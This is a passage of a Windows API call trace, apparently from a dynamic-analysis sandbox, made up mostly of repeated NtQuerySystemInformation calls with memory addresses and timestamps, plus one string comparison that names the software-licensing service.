Length=0x0, ResultLength=0x0) [0293.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea10, Length=0x38, ResultLength=0x0) [0293.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e890, Length=0x20, ResultLength=0x0) [0293.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e820, Length=0x20, ResultLength=0x0) [0293.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e820, Length=0x20, ResultLength=0x0) [0293.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.617] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f030, Length=0x50, ResultLength=0x0) [0293.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f030, Length=0x50, ResultLength=0x0) [0293.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217f030, Length=0x50, ResultLength=0x0) [0293.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef20, Length=0x50, ResultLength=0x0) [0293.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef20, Length=0x50, ResultLength=0x0) [0293.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef20, Length=0x50, ResultLength=0x0) [0293.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef20, Length=0x50, ResultLength=0x0) [0293.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee50, Length=0x38, ResultLength=0x0) [0293.626] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec80, Length=0x28, ResultLength=0x0) [0293.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec80, Length=0x28, ResultLength=0x0) [0293.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec80, Length=0x28, ResultLength=0x0) [0293.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ecf0, Length=0x28, ResultLength=0x0) [0293.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee50, Length=0x38, ResultLength=0x0) [0293.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee50, Length=0x38, ResultLength=0x0) [0293.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ecd0, Length=0x20, ResultLength=0x0) [0293.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec60, Length=0x20, ResultLength=0x0) [0293.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec60, Length=0x20, ResultLength=0x0) [0293.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.689] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.690] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee70, Length=0x50, ResultLength=0x0) [0293.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee70, Length=0x50, ResultLength=0x0) [0293.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee70, Length=0x50, ResultLength=0x0) [0293.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x50, ResultLength=0x0) [0293.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x50, ResultLength=0x0) [0293.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x50, ResultLength=0x0) [0293.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x50, ResultLength=0x0) [0293.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec90, Length=0x38, ResultLength=0x0) [0293.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x28, ResultLength=0x0) [0293.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x28, ResultLength=0x0) [0293.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x28, ResultLength=0x0) [0293.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb30, Length=0x28, ResultLength=0x0) [0293.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec90, Length=0x38, ResultLength=0x0) [0293.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec90, Length=0x38, ResultLength=0x0) [0293.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb10, Length=0x20, ResultLength=0x0) [0293.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eaa0, Length=0x20, ResultLength=0x0) [0293.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eaa0, Length=0x20, ResultLength=0x0) [0293.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217efe0, Length=0x40, ResultLength=0x0) [0293.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef40, Length=0x40, ResultLength=0x0) [0293.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef40, Length=0x40, ResultLength=0x0) [0293.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee60, Length=0x30, ResultLength=0x0) [0293.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee60, Length=0x30, ResultLength=0x0) [0293.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed68, Length=0x30, ResultLength=0x0) [0293.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ecd0, Length=0x38, ResultLength=0x0) [0293.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea90, Length=0x50, ResultLength=0x0) [0293.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea90, Length=0x50, ResultLength=0x0) [0293.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea90, Length=0x50, ResultLength=0x0) [0293.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e980, Length=0x50, ResultLength=0x0) [0293.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e980, Length=0x50, ResultLength=0x0) [0293.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e980, Length=0x50, ResultLength=0x0) [0293.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e980, Length=0x50, ResultLength=0x0) [0293.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e8b0, Length=0x38, ResultLength=0x0) [0293.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.717] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e6e0, Length=0x28, ResultLength=0x0) [0293.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e6e0, Length=0x28, ResultLength=0x0) [0293.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e6e0, Length=0x28, ResultLength=0x0) [0293.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e750, Length=0x28, ResultLength=0x0) [0293.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e8b0, Length=0x38, ResultLength=0x0) [0293.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e8b0, Length=0x38, ResultLength=0x0) [0293.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e730, Length=0x20, ResultLength=0x0) [0293.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e6c0, Length=0x20, ResultLength=0x0) [0293.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e6c0, Length=0x20, ResultLength=0x0) [0293.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef40, Length=0x40, ResultLength=0x0) [0293.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef40, Length=0x40, ResultLength=0x0) [0293.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ef40, Length=0x40, ResultLength=0x0) [0293.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee60, Length=0x30, ResultLength=0x0) [0293.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee60, Length=0x30, ResultLength=0x0) [0293.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed68, Length=0x30, ResultLength=0x0) [0293.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ecd0, Length=0x38, ResultLength=0x0) [0293.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.772] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb40, Length=0x50, ResultLength=0x0) [0293.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x28, ResultLength=0x0) [0293.773] _wcsicmp (_String1="SPPSVC\\0ff1ce15-a989-479d-af46-f275c6370663", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0293.773] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb40, Length=0x50, ResultLength=0x0) [0293.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb40, Length=0x50, ResultLength=0x0) [0293.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb40, Length=0x50, ResultLength=0x0) [0293.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea70, Length=0x38, ResultLength=0x0) [0293.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e8a0, Length=0x28, ResultLength=0x0) [0293.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e8a0, Length=0x28, ResultLength=0x0) [0293.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e8a0, Length=0x28, ResultLength=0x0) [0293.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e910, Length=0x28, ResultLength=0x0) [0293.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea70, Length=0x38, ResultLength=0x0) [0293.781] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.782] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e990, Length=0x28, ResultLength=0x0) [0293.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e990, Length=0x28, ResultLength=0x0) [0293.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e830, Length=0x20, ResultLength=0x0) [0293.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e7b0, Length=0x20, ResultLength=0x0) [0293.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e7b0, Length=0x20, ResultLength=0x0) [0293.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e7b0, Length=0x20, ResultLength=0x0) [0293.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea70, Length=0x38, ResultLength=0x0) [0293.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea70, Length=0x38, ResultLength=0x0) [0293.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e8f0, Length=0x20, ResultLength=0x0) [0293.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e880, Length=0x20, ResultLength=0x0) [0293.790] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e880, Length=0x20, ResultLength=0x0) [0293.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.791] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee70, Length=0x50, ResultLength=0x0) [0293.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee70, Length=0x50, ResultLength=0x0) [0293.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee70, Length=0x50, ResultLength=0x0) [0293.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x50, ResultLength=0x0) [0293.793] 